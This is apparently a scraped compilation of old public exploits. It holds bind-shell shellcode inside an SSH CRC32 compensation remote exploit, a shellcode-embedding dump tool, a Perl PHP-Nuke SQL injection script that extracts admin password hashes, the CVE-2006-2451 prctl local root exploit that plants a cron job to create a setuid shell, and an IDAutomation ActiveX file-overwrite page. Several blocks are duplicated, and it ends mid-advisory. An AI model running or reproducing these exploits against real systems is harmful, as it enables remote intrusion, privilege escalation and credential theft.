* Linux/x86
* TCP/36864 portshell (old, could be optimized further)
*/
char shellcode[] = /* anathema <anathema@hack.co.za> */
/* main: */
"xebx72" /* jmp callz */
/* start: */
"x5e" /* popl %esi */
/* socket() */
"x29xc0" /* subl %eax, %eax */
"x89x46x10" /* movl %eax, 0x10(%esi) */
"x40" /* incl %eax */
"x89xc3" /* movl %eax, %ebx */
"x89x46x0c" /* movl %eax, 0x0c(%esi) */
"x40" /* incl %eax */
"x89x46x08" /* movl %eax, 0x08(%esi) */
"x8dx4ex08" /* leal 0x08(%esi), %ecx */
"xb0x66" /* movb $0x66, %al */
"xcdx80" /* int $0x80 */
/* bind() */
"x43" /* incl %ebx */
"xc6x46x10x10" /* movb $0x10, 0x10(%esi) */
"x66x89x5ex14" /* movw %bx, 0x14(%esi) */
"x88x46x08" /* movb %al, 0x08(%esi) */
"x29xc0" /* subl %eax, %eax */
"x89xc2" /* movl %eax, %edx */
"x89x46x18" /* movl %eax, 0x18(%esi) */
"xb0x90" /* movb $0x90, %al */
"x66x89x46x16" /* movw %ax, 0x16(%esi) */
"x8dx4ex14" /* leal 0x14(%esi), %ecx */
"x89x4ex0c" /* movl %ecx, 0x0c(%esi) */
"x8dx4ex08" /* leal 0x08(%esi), %ecx */
"xb0x66" /* movb $0x66, %al */
"xcdx80" /* int $0x80 */
/* listen() */
"x89x5ex0c" /* movl %ebx, 0x0c(%esi) */
"x43" /* incl %ebx */
"x43" /* incl %ebx */
"xb0x66" /* movb $0x66, %al */
"xcdx80" /* int $0x80 */
/* accept() */
"x89x56x0c" /* movl %edx, 0x0c(%esi) */
"x89x56x10" /* movl %edx, 0x10(%esi) */
"xb0x66" /* movb $0x66, %al */
"x43" /* incl %ebx */
"xcdx80" /* int $0x80 */
/* dup2(s, 0); dup2(s, 1); dup2(s, 2); */
"x86xc3" /* xchgb %al, %bl */
"xb0x3f" /* movb $0x3f, %al */
"x29xc9" /* subl %ecx, %ecx */
"xcdx80" /* int $0x80 */
"xb0x3f" /* movb $0x3f, %al */
"x41" /* incl %ecx */
"xcdx80" /* int $0x80 */
"xb0x3f" /* movb $0x3f, %al */
"x41" /* incl %ecx */
"xcdx80" /* int $0x80 */
/* execve() */
"x88x56x07" /* movb %dl, 0x07(%esi) */
"x89x76x0c" /* movl %esi, 0x0c(%esi) */
"x87xf3" /* xchgl %esi, %ebx */
"x8dx4bx0c" /* leal 0x0c(%ebx), %ecx */
"xb0x0b" /* movb $0x0b, %al */
"xcdx80" /* int $0x80 */
/* callz: */
"xe8x89xffxffxff" /* call start */
"/bin/sh";
void buffer_init()
{
buffer = (char *) malloc(packet_length+8);
}
void buffer_destroy()
{
if (buffer)
free(buffer);
}
void insert_crc32_compensation_attack_pattern(unsigned long *ptr,
unsigned long value1, unsigned long value2)
{
int positions[] = {0,6,9,10,16,20,21,22,24,25,27,28,30,31,32,-1};
int i;
for (i=0; positions[i]!=-1; i++) {
ptr[ positions[i]*2 ] = value1;
ptr[ positions[i]*2+1 ] = value2;
}
}
void change_word_order()
{
int i;
char ch, ch2, *aux;
for(i = 0 ; i < 4+packet_length ; i+=4) {
aux = buffer + i;
ch=*aux;
*aux=*(aux+3);
*(aux+3)=ch;
ch=*(aux+1);
*(aux+1)=*(aux+2);
*(aux+2)=ch;
}
}
int send_packet_and_check_result(char *grepstr)
{
char commandline[512];
int ret;
FILE *f;
// Write packet
f = fopen("/tmp/exploit_packet", "wb");
fwrite(buffer, 1, (packet_length+8), f);
fclose(f);
sprintf(commandline, "%s -p %i -v -l root %s 2> /tmp/output.txt", PATH_SSH, port, host);
ret = system(commandline);
if (grepstr != NULL) {
sprintf(commandline, "grep %s /tmp/output.txt > /dev/null", grepstr);
ret = system(commandline);
}
return ret;
}
int send_packet_shellcode(unsigned long buffer_offset, unsigned long eip_offset, unsigned int presumed_MSW, unsigned int target_MSW)
{
int ret, i;
unsigned long *ptr, buffer_offset_slide, temp;
char ch,ch2;
// Set the packet lengths (first one for the ssh-client)
// (second one is sent to the server)
ptr = (unsigned long *) buffer;
*(ptr++) = packet_length;
*(ptr++) = packet_length-1;
// NOP sled (to entire packet)
memset(ptr, 0x90, packet_length);
// Running j to target_MSW (writing into the buffer, FFFF)
// The +1 in "target_MSW+1" must be used because j starts at 0
buffer_offset_slide = buffer_offset + 3;
for (i=0; i < (target_MSW + 1) * 8 && i < packet_length; i+=8, buffer_offset_slide += 4) {
*(ptr++) = buffer_offset_slide;
*(ptr++) = 0x7350ffff;
}
// Inserting CRC32 compensation attack pattern
// Change the order of MSW-LSW
ch = (target_MSW+1)&0xff;
ch2 = ((target_MSW+1)&0xff00) >> 8;
temp = (ch<<24)+(ch2<<16)+0x9090;
insert_crc32_compensation_attack_pattern(ptr, buffer_offset_slide-1, temp);
// Place EIP overwrite blocks
ptr = (unsigned long *) buffer;
ptr += 2; // skip the length information
ptr[presumed_MSW * 2] = eip_offset;
ptr[target_MSW * 2] = eip_offset;
// Change the word order in buffer
change_word_order();
// Insert the shellcode (no word-order things here)
memcpy(buffer+8+packet_length-strlen(shellcode)-16, &shellcode, strlen(shellcode));
// Send packet (no grepping)
ret = send_packet_and_check_result(NULL);
return ret;
}
int send_packet_kernel(unsigned long kernel_offset, unsigned long buffer_offset)
{
int ret, i;
unsigned long *ptr;
ptr = (unsigned long *) buffer;
*(ptr++) = packet_length;
*(ptr++) = packet_length-1;
for (i=0; i<packet_length; i+=8) {
*(ptr++) = kernel_offset;
*(ptr++) = 0x7350ffff;
}
ptr = (unsigned long *) buffer;
ptr += 2;
insert_crc32_compensation_attack_pattern(ptr+2, buffer_offset+6, 0x0100ffff);
change_word_order();
ret = send_packet_and_check_result("crc32");
return ret;
}
int find_stack(unsigned long start_offset, unsigned long buffer_offset)
{
unsigned long offset;
long step;
int ret;
int count;
offset = start_offset;
printf("Finding lower kernel area boundaryn");
while (1) {
printf(" Testing h..boundary offset 0x%08x ", offset*2);
fflush(stdout);
ret = send_packet_kernel(offset, buffer_offset);
if (ret == 0) {
printf("FOUND. (CRC32 Attack Detected)n");
break;
}
else {
printf("NOT FOUND. (SEQV)n");
}
// offset -= 0x800;
offset -=2;
}
return offset+2; // We only need the exact h..kernel distance
}
int buffer_test(unsigned long start_offset, unsigned long packet_length)
{
FILE *f;
int ret, i, j;
unsigned long *ptr;
ptr = (unsigned long *) buffer;
*(ptr++) = packet_length;
*(ptr++) = packet_length-1;
for (i=0, j=0; i<packet_length; i+=16, j+=4) {
*(ptr++) = start_offset+j;
*(ptr++) = 0xffffffff;
*(ptr++) = start_offset+j+1;
*(ptr++) = 0xffffffff;
}
change_word_order();
ret = send_packet_and_check_result("Corrupted");
return ret;
}
unsigned long find_buffer(unsigned long start_offset, unsigned stop_offset)
{
int ret;
unsigned long offset;
long step;
// Find estimate for h..buf distance
printf("Finding estimate for h..buf distancen");
offset = start_offset;
while (1) {
printf(" Testing h..buf offset: 0x%08x B", offset*2); // 2 -> 16-bit offset
fflush(stdout);
ret = buffer_test(offset, packet_length);
if (ret == 0) {
printf(" FOUND (Corrupt bytes)n");
break;
}
else {
printf(" NOT FOUND (SEQV)n");
}
offset += packet_length/2/2;
if (offset > stop_offset) {
printf("Stop offset reached. Exitingn");
return 0;
}
}
// Find exact distance
printf("Finding exact h..buf distancen");
// Calculate the step size
step = 1;
while (1) {
if (step > packet_length/2/2/2)
break;
step = step<<1;
}
offset -= step;
while(step > 3) {
printf(" Testing h..buf offset: 0x%08x B (prev. step=0x%08xh)", offset*2, step*2);
fflush(stdout);
ret = buffer_test(offset, packet_length);
step = step/2;
if (ret==0) {
printf(" FOUND. Decreasing by 0x%08xn", step);
offset -= step;
}
else {
printf(" NOT FOUND. Increasing by 0x%08xn", step);
offset += step;
}
}
printf("Found exact distance: 0x%08xn", offset*2);
return offset;
}
void try_shellcode(unsigned long eip_guess, unsigned long buf_offset, unsigned long kernel_offset)
{
long int higher, lower, p, t; // Offsets to seach, expands from the middle
unsigned long h, eip_MSW_offset, roof_reached = 0;
h = 0xc0000000 - kernel_offset * 2;
// eip_offset must point to the MSW of eip, which resides at higher half of eip. Convert to 16-b offset
eip_MSW_offset = (eip_guess - h + 2) / 2;
higher = 0;
lower = -4;
printf("Trying to run shellcode. If output stalls, telnet to %s:36864n", host);
while(1) {
for(p=0x805 ; p<=0x806 ; p++) {
for(t=p+1 ; t<=0x808 ; t++) {
if (eip_guess+higher < 0xc0000000) {
printf(" Trying shellcode / (eip_MSW@0x%08x pres_MSW=0x%04x targ_MSW=0x%04x)n", eip_guess+higher, p, t);
send_packet_shellcode(buf_offset, eip_MSW_offset + higher/2, p, t);
}
else if (!roof_reached && eip_guess+higher >= 0xc0000000) {
printf("Higher search hit kernel bound. Continue with lower search only.n");
roof_reached = 1;
}
printf(" Trying shellcode \ (eip_MSW@0x%08x pres_MSW=0x%04x targ_MSW=0x%04x)n", eip_guess+lower, p, t);
send_packet_shellcode(buf_offset, eip_MSW_offset + lower/2, p, t);
}
}
higher += 4;
lower -= 4;
}
}
int main(int argc,char *argv[])
{
unsigned long kernel_offset, buf_offset;
// initialize the buffer
buffer_init();
// find the buf
// 1st arg : start search from this offset
// 2nd arg : stop search to this offset
buf_offset = find_buffer(0x0, 102400/2*10);
// find the stack
// 1st arg : start search from this (16-bit) offset (high limit)
// 2nd arg : found buf offset
kernel_offset = find_stack(0xb7f88500/2, buf_offset);
// try to send and run shellcode
// 1st arg : initial guess where the eip is living (absolute 8-bit address)
// 2nd arg : found buf offset
// 3rd arg : found stack (0xc0000000) offset
try_shellcode(0xc0000000 - 0x2600, buf_offset, kernel_offset);
// destroy the buffer
buffer_destroy();
return 0;
}
/*
* [cdump 0.1 by PoWeR_PoRK of netric (http://www.netric.org)]
*
* Simple pipe driven utility for creating c-style char decs from binary
* input. Can be of use for embedding shellcode etc in c sourcefiles.
* Do "./shdump -h" for a usage overview.
*/
#include <stdio.h>
char usage[] =
"Usage: ./cdump [-h][-n <var name>][-u][-s <linesize>][-c [-cu]]n"
"Pipe driven utility for coverting binary data to c char declaration.n"
"Example: cat binfile | ./shdump -u -s 20 >> bin.cn"
"This adds the contents of binfile to bin.c in char declaration formatnn"
"-h <var name> See this usage overviewn"
"-n Name of the char identifier (maxsize=30, default=foobar)n"
"-u Set this to uppercase the hex outputn"
"-s <linesize> Set the maximum line size per byte input (default=10)n"
"-c Comment the byte offsets into the outputn"
"-cu Set this to uppercase hex chars in byte offset commentn";
int main(int argc, char **argv[])
{
int i = -2,oldi, lsize = 10, ucase = 0, npar = 1, cc = 1, cmt = 0, cucase = 0;
unsigned long place = 0;
char c, vname[31];
vname[30] = 0;
strncpy(&vname, "foobar", 30);
if(argc > 1){
if(!strncmp(argv[1], "-h", 2)){
printf("%s", &usage);
exit(0);
}
while(npar <= 5 && npar <= (argc - 1)){
if(!strncmp(argv[npar], "-n", 2)){
strncpy(&vname, argv[npar+1], 30);
npar+=2;
}else if(!strncmp(argv[npar], "-u", 2)){
ucase = 1;
npar++;
}else if(!strncmp(argv[npar], "-s", 2)){
lsize = atoi(argv[npar+1]);
npar+=2;
}else if(!strncmp(argv[npar], "-c", 2)){
cmt = 1;
npar++;
if(npar <= (argc - 1)){
if(!strncmp(argv[npar], "-cu", 3)){
cucase = 1;
npar++;
}
}
}else{
npar = argc;
}
}
}
if(strchr((char *)&vname, 37) != NULL){
printf("Cheeky Bastard! :P (fmt exploitation not allowed)n");
exit(0);
}
oldi = getchar();
printf("char %s =n/* 0000:0000 */ "", (char *)&vname);
while(oldi != EOF )
{
if( ucase == 0 ){
printf("x%.2x", oldi);
}else if( ucase == 1 ){
printf("x%.2X", oldi);
}
if(cc >= lsize){
if(cmt == 1){
place += cc;
if(cucase == 1){
printf(""n/* %.4X:%.4X */ ", *((unsigned short *)&place + 1), *((unsigned short *)&place));
}else{
printf(""n/* %.4x:%.4x */ ", *((unsigned short *)&place + 1), *((unsigned short *)&place));
}
}else{
printf(""n");
}
printf(""");
cc = 0;
}
cc++;
oldi = getchar();
}
printf("";n");
return 0;
}
* [cdump 0.1 by PoWeR_PoRK of netric (http://www.netric.org)]
*
* Simple pipe driven utility for creating c-style char decs from binary
* input. Can be of use for embedding shellcode etc in c sourcefiles.
* Do "./shdump -h" for a usage overview.
*/
#include <stdio.h>
char usage[] =
"Usage: ./cdump [-h][-n <var name>][-u][-s <linesize>][-c [-cu]]n"
"Pipe driven utility for coverting binary data to c char declaration.n"
"Example: cat binfile | ./shdump -u -s 20 >> bin.cn"
"This adds the contents of binfile to bin.c in char declaration formatnn"
"-h <var name> See this usage overviewn"
"-n Name of the char identifier (maxsize=30, default=foobar)n"
"-u Set this to uppercase the hex outputn"
"-s <linesize> Set the maximum line size per byte input (default=10)n"
"-c Comment the byte offsets into the outputn"
"-cu Set this to uppercase hex chars in byte offset commentn";
int main(int argc, char **argv[])
{
int i = -2,oldi, lsize = 10, ucase = 0, npar = 1, cc = 1, cmt = 0, cucase = 0;
unsigned long place = 0;
char c, vname[31];
vname[30] = 0;
strncpy(&vname, "foobar", 30);
if(argc > 1){
if(!strncmp(argv[1], "-h", 2)){
printf("%s", &usage);
exit(0);
}
while(npar <= 5 && npar <= (argc - 1)){
if(!strncmp(argv[npar], "-n", 2)){
strncpy(&vname, argv[npar+1], 30);
npar+=2;
}else if(!strncmp(argv[npar], "-u", 2)){
ucase = 1;
npar++;
}else if(!strncmp(argv[npar], "-s", 2)){
lsize = atoi(argv[npar+1]);
npar+=2;
}else if(!strncmp(argv[npar], "-c", 2)){
cmt = 1;
npar++;
if(npar <= (argc - 1)){
if(!strncmp(argv[npar], "-cu", 3)){
cucase = 1;
npar++;
}
}
}else{
npar = argc;
}
}
}
if(strchr((char *)&vname, 37) != NULL){
printf("Cheeky Bastard! :P (fmt exploitation not allowed)n");
exit(0);
}
oldi = getchar();
printf("char %s =n/* 0000:0000 */ "", (char *)&vname);
while(oldi != EOF )
{
if( ucase == 0 ){
printf("x%.2x", oldi);
}else if( ucase == 1 ){
printf("x%.2X", oldi);
}
if(cc >= lsize){
if(cmt == 1){
place += cc;
if(cucase == 1){
printf(""n/* %.4X:%.4X */ ", *((unsigned short *)&place + 1), *((unsigned short *)&place));
}else{
printf(""n/* %.4x:%.4x */ ", *((unsigned short *)&place + 1), *((unsigned short *)&place));
}
}else{
printf(""n");
}
printf(""");
cc = 0;
}
cc++;
oldi = getchar();
}
printf("";n");
return 0;
}
#!/usr/bin/perl -w
use IO::Socket;
########################################
## THIS CODE PUBLIC NOW =))) ##
########################################
## __________ ___ ___ ##
## ______ __ __ ______/ | ##
## | _/ | / ___/ _ ##
## | | | /___ \ / ##
## |____|_ /____//____ >___|_ / ##
## / / / ##
########################################
## based on 'cid' sql injection vuln
## in Download module, more info about
## this vuln u can see here:
## http://rst.void.ru/texts/advisory10.htm
########################################
## work only on mysql version > 4.0
########################################
## tested on PHP-Nuke versions: 6.9, 6.0, 6.5
## C:>r57phpnuke.pl 127.0.0.1 /phpnuke/ admin
##
## server : 127.0.0.1
## folder : /phpnuke/
## aid : admin
##
## [~] prepare to connect...
## [+] connected
## [~] prepare to send data...
## [+] success
## [~] wait for reply...
## [+] w00t...
## [+] USER: admin
## [+] MD5 HASH: 5f4dcc3b5aa765d61d8327deb882cf99
##
########################################
if (@ARGV < 3)
{
print "################################################################n";
print " r57nuke-cid.pl - PHP-NUKE 'cid' sql injection exploitn";
print " by RusH security team // www.rsteam.ru , http://rst.void.run";
print " coded by 1dt.w0lf // r00t@rsteam.ru // 17.09.2003n";
print "################################################################n";
print " Usage:n";
print " r57nuke-cid.pl <host> </folder/> <aid>n";
print "n";
print " <host> - host for attackn";
print " </folder/> - PHP-nuke folder ( /phpnuke/ , /nuke/ or / for no folder )n";
print " <aid> - user aid , nick ( admin , blabla )n";
print "##################################################################";
exit();
}
$server = $ARGV[0];
$folder = $ARGV[1];
$aid = $ARGV[2];
print "n";
print "server : $servern";
print "folder : $foldern";
print "aid : $aidn";
print "n";
$success = 0;
$path_download = "modules.php?name=Downloads&d_op=viewdownload&cid=2%20UNION%20select%20counter,%20aid,%20pwd%20FROM%20nuke_authors%20--";
$GET = $folder . $path_download;
print "[~] prepare to connect...n";
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80") || die "[-] connect failedn";
print "[+] connectedn";
print "[~] prepare to send data...n";
print $socket "GET $GET HTTP/1.1n";
print $socket "Host: $servern";
print $socket "Accept: */*n";
print $socket "Http-Referer: http://microsoft.comn";
print $socket "User-Agent: Internet Explorer 6.0n";
print $socket "Pragma: no-cachen";
print $socket "Cache-Control: no-cachen";
print $socket "Connection: closenn";
print "[+] successn";
print "[~] wait for reply...n";
while ($answer = <$socket>)
{
#print "$answer";
if ($answer=~/(&cid=)(w)("><b>)($aid)(</b></a></font>)(.{0,20})(<font class="content">)(.{32})(</font>)/)
{
$success = 1;
print "[+] w00t...n";
print "[+] USER: $1 n[+] MD5 HASH: $6n";
}
}
if ($success == 0) { print "[-] exploit failed =(n"; }
use IO::Socket;
########################################
## THIS CODE PUBLIC NOW =))) ##
########################################
## __________ ___ ___ ##
## ______ __ __ ______/ | ##
## | _/ | / ___/ _ ##
## | | | /___ \ / ##
## |____|_ /____//____ >___|_ / ##
## / / / ##
########################################
## based on 'cid' sql injection vuln
## in Download module, more info about
## this vuln u can see here:
## http://rst.void.ru/texts/advisory10.htm
########################################
## work only on mysql version > 4.0
########################################
## tested on PHP-Nuke versions: 6.9, 6.0, 6.5
## C:>r57phpnuke.pl 127.0.0.1 /phpnuke/ admin
##
## server : 127.0.0.1
## folder : /phpnuke/
## aid : admin
##
## [~] prepare to connect...
## [+] connected
## [~] prepare to send data...
## [+] success
## [~] wait for reply...
## [+] w00t...
## [+] USER: admin
## [+] MD5 HASH: 5f4dcc3b5aa765d61d8327deb882cf99
##
########################################
if (@ARGV < 3)
{
print "################################################################n";
print " r57nuke-cid.pl - PHP-NUKE 'cid' sql injection exploitn";
print " by RusH security team // www.rsteam.ru , http://rst.void.run";
print " coded by 1dt.w0lf // r00t@rsteam.ru // 17.09.2003n";
print "################################################################n";
print " Usage:n";
print " r57nuke-cid.pl <host> </folder/> <aid>n";
print "n";
print " <host> - host for attackn";
print " </folder/> - PHP-nuke folder ( /phpnuke/ , /nuke/ or / for no folder )n";
print " <aid> - user aid , nick ( admin , blabla )n";
print "##################################################################";
exit();
}
$server = $ARGV[0];
$folder = $ARGV[1];
$aid = $ARGV[2];
print "n";
print "server : $servern";
print "folder : $foldern";
print "aid : $aidn";
print "n";
$success = 0;
$path_download = "modules.php?name=Downloads&d_op=viewdownload&cid=2%20UNION%20select%20counter,%20aid,%20pwd%20FROM%20nuke_authors%20--";
$GET = $folder . $path_download;
print "[~] prepare to connect...n";
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80") || die "[-] connect failedn";
print "[+] connectedn";
print "[~] prepare to send data...n";
print $socket "GET $GET HTTP/1.1n";
print $socket "Host: $servern";
print $socket "Accept: */*n";
print $socket "Http-Referer: http://microsoft.comn";
print $socket "User-Agent: Internet Explorer 6.0n";
print $socket "Pragma: no-cachen";
print $socket "Cache-Control: no-cachen";
print $socket "Connection: closenn";
print "[+] successn";
print "[~] wait for reply...n";
while ($answer = <$socket>)
{
#print "$answer";
if ($answer=~/(&cid=)(w)("><b>)($aid)(</b></a></font>)(.{0,20})(<font class="content">)(.{32})(</font>)/)
{
$success = 1;
print "[+] w00t...n";
print "[+] USER: $1 n[+] MD5 HASH: $6n";
}
}
if ($success == 0) { print "[-] exploit failed =(n"; }
/*****************************************************/
/* Local r00t Exploit for: */
/* Linux Kernel PRCTL Core Dump Handling */
/* ( BID 18874 / CVE-2006-2451 ) */
/* Kernel 2.6.x (>= 2.6.13 && < 2.6.17.4) */
/* By: */
/* - dreyer <luna@aditel.org> (main PoC code) */
/* - RoMaNSoFt <roman@rs-labs.com> (local root code) */
/* [ 10.Jul.2006 ] */
/*****************************************************/
#include <stdio.h>
#include <sys/time.h>
#include <sys/resource.h>
#include <unistd.h>
#include <linux/prctl.h>
#include <stdlib.h>
#include <sys/types.h>
#include <signal.h>
char *payload="nSHELL=/bin/shnPATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/binn* * * * * root cp /bin/sh /tmp/sh ; chown root /tmp/sh ; chmod 4755 /tmp/sh ; rm -f /etc/cron.d/coren";
int main() {
int child;
struct rlimit corelimit;
printf("Linux Kernel 2.6.x PRCTL Core Dump Handling - Local r00tn");
printf("By: dreyer & RoMaNSoFtn");
printf("[ 10.Jul.2006 ]nn");
corelimit.rlim_cur = RLIM_INFINITY;
corelimit.rlim_max = RLIM_INFINITY;
setrlimit(RLIMIT_CORE, &corelimit);
printf("[*] Creating Cron entryn");
if ( !( child = fork() )) {
chdir("/etc/cron.d");
prctl(PR_SET_DUMPABLE, 2);
sleep(200);
exit(1);
}
kill(child, SIGSEGV);
printf("[*] Sleeping for aprox. one minute (** please wait **)n");
sleep(62);
printf("[*] Running shell (remember to remove /tmp/sh when finished) ...n");
system("/tmp/sh -i");
}
// milw0rm.com [2006-07-11]
2.6.17.4 이하 버젼은 다 뚤림
/* Local r00t Exploit for: */
/* Linux Kernel PRCTL Core Dump Handling */
/* ( BID 18874 / CVE-2006-2451 ) */
/* Kernel 2.6.x (>= 2.6.13 && < 2.6.17.4) */
/* By: */
/* - dreyer <luna@aditel.org> (main PoC code) */
/* - RoMaNSoFt <roman@rs-labs.com> (local root code) */
/* [ 10.Jul.2006 ] */
/*****************************************************/
#include <stdio.h>
#include <sys/time.h>
#include <sys/resource.h>
#include <unistd.h>
#include <linux/prctl.h>
#include <stdlib.h>
#include <sys/types.h>
#include <signal.h>
char *payload="nSHELL=/bin/shnPATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/binn* * * * * root cp /bin/sh /tmp/sh ; chown root /tmp/sh ; chmod 4755 /tmp/sh ; rm -f /etc/cron.d/coren";
int main() {
int child;
struct rlimit corelimit;
printf("Linux Kernel 2.6.x PRCTL Core Dump Handling - Local r00tn");
printf("By: dreyer & RoMaNSoFtn");
printf("[ 10.Jul.2006 ]nn");
corelimit.rlim_cur = RLIM_INFINITY;
corelimit.rlim_max = RLIM_INFINITY;
setrlimit(RLIMIT_CORE, &corelimit);
printf("[*] Creating Cron entryn");
if ( !( child = fork() )) {
chdir("/etc/cron.d");
prctl(PR_SET_DUMPABLE, 2);
sleep(200);
exit(1);
}
kill(child, SIGSEGV);
printf("[*] Sleeping for aprox. one minute (** please wait **)n");
sleep(62);
printf("[*] Running shell (remember to remove /tmp/sh when finished) ...n");
system("/tmp/sh -i");
}
// milw0rm.com [2006-07-11]
2.6.17.4 이하 버젼은 다 뚤림
-----------------------------------------------------------------------------
IDAutomation Multiple Vulnerabilities
url: www.idautomation.com
Author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://shinnai.altervista.org
This was written for educational purpose. Use it at your own risk.
Author will be not responsible for any damage.
Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
In memory of rgod
-----------------------------------------------------------------------------
<b>IDAutomation Linear BarCode:</b> <object classid='clsid:0C3874AA-AB39-4B5E-A768-45F3CE6C6819' id='IDLinear'></object>
<b>IDautomation Datamatrix Barcode:</b> <object classid='clsid:DB67DB99-616A-4CAB-A3A1-2EF644F254E7' id='IDDataMatrix'></object>
<b>IDautomation PDF417 Barcode:</b> <object classid='clsid:E97EE6EB-7FBE-43B1-B6D8-C4D86C78C5A0' id='IDPDF'></object>
<b>IDautomation Aztec Barcode:</b> <object classid='clsid:eba15b30-80b4-11dc-b31d-0050c2490048' id='IDAztec'></object>
-----------------------------------------------------------------------------
<select style="width: 404px" name="IDAuto">
<option value = "IDLinearOpt">IDAutomation Linear BarCode</option>
<option value = "IDDataMatrixOpt">IDautomation Datamatrix Barcode</option>
<option value = "IDPDFOpt">IDautomation PDF417 Barcode</option>
<option value = "IDAztecOpt">IDautomation Aztec Barcode</option>
</select>
<select style="width: 404px" name="IDMethods">
<option value = "SaveBarCode">SaveBarCode</option>
<option value = "SaveEnhWMF">SaveEnhWMF</option>
</select>
<input language=VBScript onclick=tryMe() type=button value='Click here to start the test'>
<script language='vbscript'>
Sub tryMe
On Error Resume Next
If IDAuto.value="IDLinearOpt" And IDMethods.Value = "SaveBarCode" Then
IDLinear.SaveBarCode "C:\IDLinearSaveBarCode.txt"
MsgBox "Exploit completed!"
ElseIf IDAuto.value="IDLinearOpt" And IDMethods.Value = "SaveEnhWMF" Then
IDLinear.SaveBarCode "C:\IDLinearSaveEnhWMF.txt"
MsgBox "Exploit completed!"
ElseIf IDAuto.value="IDDataMatrixOpt" And IDMethods.Value = "SaveBarCode" Then
IDDataMatrix.SaveBarCode "C:\IDDataMatrixSaveBarCode.txt"
MsgBox "Exploit completed!"
ElseIf IDAuto.value="IDDataMatrixOpt" And IDMethods.Value = "SaveEnhWMF" Then
IDDataMatrix.SaveBarCode "C:\IDDataMatrixSaveEnhWMF.txt"
MsgBox "Exploit completed!"
ElseIf IDAuto.value="IDPDFOpt" And IDMethods.Value = "SaveBarCode" Then
IDPDF.SaveBarCode "C:\IDPDFSaveBarCode.txt"
MsgBox "Exploit completed!"
ElseIf IDAuto.value="IDPDFOpt" And IDMethods.Value = "SaveEnhWMF" Then
IDPDF.SaveEnhWMF "C:\IDPDFSaveEnhWMF.txt"
MsgBox "Exploit completed!"
ElseIf IDAuto.value="IDAztecOpt" And IDMethods.Value = "SaveBarCode" Then
IDAztec.SaveBarCode "C:\IDAztecSaveBarCode.txt"
MsgBox "Exploit completed!"
ElseIf IDAuto.value="IDAztecOpt" And IDMethods.Value = "SaveEnhWMF" Then
IDAztec.SaveEnhWMF "C:\IDAztecSaveEnhWMF.txt"
MsgBox "Exploit completed!"
Else
MsgBox "Be safe..."
End if
End Sub
</script>
# milw0rm.com [2008-05-14]
IDAutomation Multiple Vulnerabilities
url: www.idautomation.com
Author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://shinnai.altervista.org
This was written for educational purpose. Use it at your own risk.
Author will be not responsible for any damage.
Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
In memory of rgod
-----------------------------------------------------------------------------
<b>IDAutomation Linear BarCode:</b> <object classid='clsid:0C3874AA-AB39-4B5E-A768-45F3CE6C6819' id='IDLinear'></object>
<b>IDautomation Datamatrix Barcode:</b> <object classid='clsid:DB67DB99-616A-4CAB-A3A1-2EF644F254E7' id='IDDataMatrix'></object>
<b>IDautomation PDF417 Barcode:</b> <object classid='clsid:E97EE6EB-7FBE-43B1-B6D8-C4D86C78C5A0' id='IDPDF'></object>
<b>IDautomation Aztec Barcode:</b> <object classid='clsid:eba15b30-80b4-11dc-b31d-0050c2490048' id='IDAztec'></object>
-----------------------------------------------------------------------------
<select style="width: 404px" name="IDAuto">
<option value = "IDLinearOpt">IDAutomation Linear BarCode</option>
<option value = "IDDataMatrixOpt">IDautomation Datamatrix Barcode</option>
<option value = "IDPDFOpt">IDautomation PDF417 Barcode</option>
<option value = "IDAztecOpt">IDautomation Aztec Barcode</option>
</select>
<select style="width: 404px" name="IDMethods">
<option value = "SaveBarCode">SaveBarCode</option>
<option value = "SaveEnhWMF">SaveEnhWMF</option>
</select>
<input language=VBScript onclick=tryMe() type=button value='Click here to start the test'>
<script language='vbscript'>
Sub tryMe
On Error Resume Next
If IDAuto.value="IDLinearOpt" And IDMethods.Value = "SaveBarCode" Then
IDLinear.SaveBarCode "C:\IDLinearSaveBarCode.txt"
MsgBox "Exploit completed!"
ElseIf IDAuto.value="IDLinearOpt" And IDMethods.Value = "SaveEnhWMF" Then
IDLinear.SaveBarCode "C:\IDLinearSaveEnhWMF.txt"
MsgBox "Exploit completed!"
ElseIf IDAuto.value="IDDataMatrixOpt" And IDMethods.Value = "SaveBarCode" Then
IDDataMatrix.SaveBarCode "C:\IDDataMatrixSaveBarCode.txt"
MsgBox "Exploit completed!"
ElseIf IDAuto.value="IDDataMatrixOpt" And IDMethods.Value = "SaveEnhWMF" Then
IDDataMatrix.SaveBarCode "C:\IDDataMatrixSaveEnhWMF.txt"
MsgBox "Exploit completed!"
ElseIf IDAuto.value="IDPDFOpt" And IDMethods.Value = "SaveBarCode" Then
IDPDF.SaveBarCode "C:\IDPDFSaveBarCode.txt"
MsgBox "Exploit completed!"
ElseIf IDAuto.value="IDPDFOpt" And IDMethods.Value = "SaveEnhWMF" Then
IDPDF.SaveEnhWMF "C:\IDPDFSaveEnhWMF.txt"
MsgBox "Exploit completed!"
ElseIf IDAuto.value="IDAztecOpt" And IDMethods.Value = "SaveBarCode" Then
IDAztec.SaveBarCode "C:\IDAztecSaveBarCode.txt"
MsgBox "Exploit completed!"
ElseIf IDAuto.value="IDAztecOpt" And IDMethods.Value = "SaveEnhWMF" Then
IDAztec.SaveEnhWMF "C:\IDAztecSaveEnhWMF.txt"
MsgBox "Exploit completed!"
Else
MsgBox "Be safe..."
End if
End Sub
</script>
# milw0rm.com [2008-05-14]
<!--
Internet Explorer "Print Table of Links" Cross-Zone Scripting Vulnerability
Author: Aviv Raff
http://aviv.raffon.net/
Summary
Internet Explorer is prone to a Cross-Zone Scripting vulnerability in
its “Print Table of Links” feature. This feature allows users to add to
a printed web page an appendix which contains a table of all the links
in that webpage.
An attacker can easily add a specially crafted link to a webpage (e.g.
at his own website, comments in blogs, social networks, Wikipedia,
etc.), so whenever a user will print this webpage with this feature
enabled, the attacker will be able to run arbitrary code on the user’s
machine (i.e. in order to take control over the machine).
Affected version
Internet Explorer 7.0 and 8.0b on a fully patched Windows XP.
Windows Vista with UAC enabled is partially affected (Information Leakage only).
Earlier versions of Internet Explorer may also be affected.
Technical details
